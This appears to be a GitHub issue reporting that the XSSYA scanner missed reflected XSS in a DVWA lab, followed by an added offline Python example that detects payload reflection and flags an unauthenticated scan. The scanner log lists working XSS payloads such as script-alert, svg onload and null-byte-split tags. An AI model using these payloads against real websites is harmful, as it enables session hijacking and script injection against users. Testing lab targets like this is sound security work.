Open Hax0rG1rl opened 10 years ago
Hi,
I've just tested this one in the following test scenario:
"
XSS Scanner
Enter your choice [1-2] : 1
Date: Tue, 05 Aug 2014 07:34:02 GMT
Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.25
X-Powered-By: PHP/5.4.25
Set-Cookie: PHPSESSID=e2to1m5drn7o6q7t1n143mk5h4; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: security=low
Content-Length: 1224
Connection: close
Content-Type: text/html;charset=utf-8
"
The application determined that the link is not vulnerable to XSS, which is not true.
Here is the application output:
"
Scanning The Host: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=
[+] Loaded: 28 payloads
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E
Source Length: 1224
WAF Not Found
[-] Not Vulnerable.
[-] False Positive
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E
Source Length: 1224
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=
Source Length: 1224
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name='';!--"=&{()}
Source Length: 1224
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=%3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E<scr
Source Length: 1224
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=</script><script>alert(1)</script>
Source Length: 1224
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=<scri%00pt>alert(1);</scri%00pt>
Source Length: 1224
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=<scri%00pt>confirm(0);</scri%00pt>
Source Length: 1224
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=5rt(0);'>rhainfosec
Source Length: 1224
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=<marquee/onstart=confirm(2)>
Source Length: 1224
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=XSS
Source Length: 1224
Testing: http://192.168.2.130/dvwa/vulnerabilities/xss_r/?name=<svg/onload=prompt(1);>
Source Length: 1224
Save Page CODE:? y
Print HTML CODE:? y
Date: Tue, 05 Aug 2014 07:36:37 GMT
Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.25
X-Powered-By: PHP/5.4.25
Set-Cookie: PHPSESSID=0l288no7jicbm4u69df3ksqjf6; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: security=low
Content-Length: 1224
Connection: close
Content-Type: text/html;charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
"
The XSS patterns are in pictures. For some security reasons, GitHub doesn't let me have them narrowed down as clear text.
Check XSSYA V2 https://github.com/yehia-mamdouh/XSSYA-V-2.0
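Two things stand out in the output above: every payload produces the same Source Length (1224, the same Content-Length as the request with an empty name parameter), and each of the two header dumps sets a different PHPSESSID. That pattern is consistent with the scanner receiving the same page back whatever it injects (for example DVWA's login page when no session cookie is sent), so the payload never reaches the reflecting code and "Not Vulnerable" says nothing about the target. The block below is an added example, not XSSYA's code and not part of this issue: it decides reflected XSS by searching the response body for the payload, raw or HTML-encoded, and separately flags a run in which every response is byte-identical to the baseline. The `dvwa_low`, `dvwa_high` and `login_page` functions are constructed stand-ins for the target, not captured DVWA responses, and the payload list is a hypothetical subset of the ones in the report.

```python
import html
from typing import Callable, Dict, List


def php_htmlspecialchars(s: str) -> str:
    """Mimic PHP htmlspecialchars() with default flags: & < > and " are escaped, ' is not."""
    return (s.replace("&", "&amp;").replace("<", "&lt;")
             .replace(">", "&gt;").replace('"', "&quot;"))


# Constructed stand-ins for the target page so the example runs offline.
# These are assumptions, not captured DVWA responses.
def dvwa_low(name: str) -> str:
    # Low level: the parameter is reflected verbatim (exploitable).
    return f"<pre>Hello {name}</pre>"


def dvwa_high(name: str) -> str:
    # Hardened level: reflected through htmlspecialchars(), so tags cannot form.
    return f"<pre>Hello {php_htmlspecialchars(name)}</pre>"


def login_page(_name: str) -> str:
    # Unauthenticated client: the same page comes back whatever the input.
    return "<form action='login.php'>Login</form>"


# Hypothetical subset of the payloads listed in the report.
PAYLOADS: List[str] = [
    "<script>alert('XSSYA')</script>",
    "<svg/onload=prompt(1);>",
    "<marquee/onstart=confirm(2)>",
]


def encoded_forms(payload: str) -> set:
    """HTML-encoded spellings a server might reflect instead of the raw payload."""
    return {
        html.escape(payload, quote=True),    # escapes ' as &#x27; and " as &quot;
        html.escape(payload, quote=False),   # escapes only & < >
        php_htmlspecialchars(payload),       # PHP default: & < > "
    }


def classify_reflection(payload: str, body: str) -> str:
    """'raw' if the payload is echoed unchanged, 'encoded' if only an HTML-escaped
    copy appears, 'none' if the input does not show up in the body at all."""
    if payload in body:
        return "raw"
    if any(form in body for form in encoded_forms(payload)):
        return "encoded"
    return "none"


def scan(fetch: Callable[[str], str], payloads: List[str]) -> Dict[str, object]:
    """Send every payload through fetch() and compare each body with a baseline request."""
    baseline = fetch("")
    reflections: Dict[str, str] = {}
    identical = 0
    for payload in payloads:
        body = fetch(payload)
        reflections[payload] = classify_reflection(payload, body)
        if body == baseline:
            identical += 1
    return {
        "vulnerable": any(r == "raw" for r in reflections.values()),
        "reflections": reflections,
        # Every response byte-identical to the baseline means the input never reached
        # the page logic (no session, redirect to login, wrong parameter name). A
        # "Not Vulnerable" verdict in that state is a scanner failure, not a finding.
        "harness_suspect": identical == len(payloads),
    }


if __name__ == "__main__":
    for label, backend in (("low", dvwa_low), ("high", dvwa_high), ("login", login_page)):
        print(label, scan(backend, PAYLOADS))
```

The check worth carrying over to any scanner run against DVWA is the baseline comparison: if the body never changes between payloads, authenticate first (send the PHPSESSID and security cookies from a logged-in browser session) and confirm by hand that the name parameter is reflected before reading anything into a "Not Vulnerable" verdict.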